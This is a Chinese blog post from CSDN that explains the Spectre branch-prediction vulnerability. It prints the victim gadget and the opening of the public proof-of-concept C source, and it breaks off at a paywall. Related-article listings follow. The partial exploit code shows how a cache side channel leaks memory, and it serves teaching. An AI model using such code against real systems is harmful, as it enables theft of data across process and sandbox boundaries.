Intel spetre漏洞解析 代码解析

最新推荐文章于 2022-10-31 17:24:42 发布
最新推荐文章于 2022-10-31 17:24:42 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forevertingting/article/details/79086820
版权

熔炉原理

当CPU发现分支预测错误时会丢弃分支执行的结果,恢复CPU的状态,但是不会恢复CPU Cache的状态,利用这一点可以突破进程间的访问限制(如浏览器沙箱)获取其他进程的数据。

具体攻击过程可以分为三个阶段:

1)训练CPU的分支预测单元使其在运行利用代码时会进行特定的预测执行

2)预测执行使得CPU将要访问的地址的内容读取到CPU Cache中

3) 通过缓存测信道攻击,可以知道哪一个数组元素被访问过,也即对应的内存页存放在CPU Cache中,从而推测出地址的内容。
重要代码部分
下个函数 是越权访问的关键,普通情况下会只在x

void victim_function(size_t x)
{
    if (x < array1_size)
    {
        temp &= array2[array1[x] * 512];
    }
}

以下是源代码

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

 uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
/*通过预测机制,读取违规数据进入cache*/
 void victim_function(size_t x) {
 if (x < array1_size) {
 temp &= array2[array1[x] * 512];
 }
 }


 /********************************************************************
32 Analysis code
33 ********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

 /* Report best guess in value[0] and runner-up in value[1] */
 /*readmemory训练多次,调用victim function(),每6次一个攻击,由于前面训练结果,或导致victim——function预测,将违规数据(x>array1_size)缓存到cache中,t推测代码通过 FLUSH=PROBE推测刚刚违规操作的位置,确定array2[x]的值,造成泄漏*/
 void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[
最低0.47元/天 解锁文章
forevertingting
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
void _mm_clflush(void const*_P)
RToax
05-07 962
/** * File: _mm_clflush.c * Author: Rong Tao <rongtao@???.cn> * Date: 2022.05.06 * * _mm_clflush() will flush cacheline if vars in cache. * * Refs: * https://www.codenong.com/52525886/ * https://zhuanlan.zhihu.com/p/242740319 */ #include.
Web漏洞-RCE代码及命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
最新发布
ran的博客
04-03 1643
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
CPU数据预取对软件性能的影响
百里杨的博客
07-31 4347
一、什么是预取 预取是指将内存中的指令和数据提前存放到cache(L1、L2、L3)中,从而加快处理器执行速度。 Cache预取可以通过硬件或者软件实现,也就是分为硬件预取和软件预取两类。 硬件预取,是通过处理器中专门的硬件来实现的,该硬件监控正在执行程序中请求的指令或数据,识别下一个程序需要的流然后预取到处理器中。 软件预取,是通过编译器分析代码然后在程序编译的过程中插入prefetch。这样在执行过程中在指定位置就会进行预取的动作。 本文讨论的预取指软件预取。 二、使用_mm_prefetch预取
clflush指令
热门推荐
愿世界和平的IT劝退师
04-14 1万+
CLFLUSH - 缓存线清除 操作 指令 说明 0F AE /7 CLFLUSH m8 清除包含 m8 的缓存线。 说明 在处理器缓存层次结构(数据与指令)的所有级别中,使包含源操作数指定的线性地址的缓存线失效。失效会在整个缓存一致性域中传播。如果缓存层次结构中任何级别的缓存
PHP程序的常见漏洞攻击分析
weixin_30882895的博客
09-22 393
PHP程序也不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来...
自制【CAN数据解析器】
01-26
从压缩包子文件的文件名称列表"CAN数据解析器"来看,可能包含的是这个解析器的源代码、可执行程序、用户手册或其他相关资源。用户可以通过这些文件深入了解CAN数据解析器的工作原理,或者自定义其功能以适应特定需求...
StormoverGearpump&StreamingSQLonSpark解析
02-26
StormoverGearpump,即在Gearpump上提供一个Storm的透明的兼容层,用户可以不改一行代码,不用重新定义它的jar包,就可以把Storm运行到Gearpump上。Storm是业界使用最广泛的流处理引擎,但也暴露出了不少局限性。这些...
NFC近距离传输方案解析
01-20
【NFC近距离传输方案解析】 随着移动互联网的快速发展,智能手机成为了技术革新的前沿阵地。2012年,双核处理器成为智能手机的标准配置,ARM架构因其高效能和低能耗特性在移动设备领域占据主导地位。面对这样的市场...
Thunderbolt超高速接口技术解析
01-20
 美国当地时间2011年2月24日,英特尔正式发布了已经宣传数月的英特尔实验室产品代号为Thunderbolt超高速接口技术"Light Peak",并将其命名为Thunderbolt雷电, 该技术由英特尔在2009年设计完成, Thunderbolt的研发...
硬件必会之三极管实用解析
01-20
 1、学会实际工程应用中常用的三极管电路(以英特尔公司经典电路为例);  2、学到推挽电路,并且了解非常重要的拉电流和灌电流的及概念;  3、数字集成电路畅行的年代,为什么还需要学习模拟知识,背后的逻辑...
Intel CPU spectre漏洞利用方法
07-31
奥地利 Graz 理工大学的研究人员演示了通过网络远程利用 Spectre V1 漏洞的方法。他们将这一利用方法命名为 NetSpectre。通过 NetSpectre,攻击者无需在目标系统执行任何代码就能远程读取系统内存。
解析漏洞
02-28
这是一个带文件上传的网站源,可以用来测试解析漏洞
USB 3.0电缆实物解析
11-05
现在,Intel正在率领一众业内厂商开发下一代的USB 3.0标准,也叫做USB Superspeed,速度有望再次提高10倍。既然USB 3.0不出意外的话,很快就会成为PC行业的通用接口标准,作为发烧友的你,肯定不能对它一无所知。...
Intel 解析工具试用版,支持解析H.265
01-21
Intel 解析工具试用版,支持解析H.265
FPGA深度解析pdf
03-03
此外,书中还可能涉及FPGA的集成开发环境,如Xilinx的Vivado、Intel的Quartus Prime或Lattice的Diamond。这些工具提供了从设计、综合、布局布线到仿真、验证的一站式解决方案,学习如何有效地使用它们是FPGA设计...
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Spectre(幽灵)CPU缓存漏洞原理
weixin_43669969的博客
05-19 2621
Spectre(幽灵)CPU缓存漏洞原理 偶然看到了一篇这样的推送,但是感觉作者没有说清楚,所以自己琢磨了好一会儿才弄懂,现在写来说说自己的通俗理解,Meltdown(熔断)原理和这个类似,网上有很多的详解,大家可以去看 相关的Meltdown和Spectre的漏洞代码github上已开源,大家可以去读一下源 https://github.com/Eugnis/spectre-attack https://github.com/feruxmax/meltdown https://github.com/g
Spectre侧信道攻击过程验证【头歌教学实践平台】
m0_64587776的博客
10-31 766
头歌教学实践平台——Spectre侧信道攻击过程验证 Spectre漏洞是2017年被发现并于2018年1月份被公开披露的一个处理器A级漏洞,涉及CVE编号CVE-2017-5754。该漏洞出现的根源在于当前CPU为了提高运行效率而使用的一种优化机制——预测执行,该机制的目的在于提前准备好计算结果和内存数据等,确保CPU需要该数据被能够被立即获取。利用该漏洞,攻击者可以突破进程间的隔离和用户间的隔离,窃取其他进程或用户的数据,漏洞影响涉及Intel、AMD、ARM等主流的处理器,覆盖从个人电脑到云服务器等
干货 | 命令执行漏洞代码执行漏洞详解
weixin_39670937的博客
06-20 856
命令执行(RCE)漏洞代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值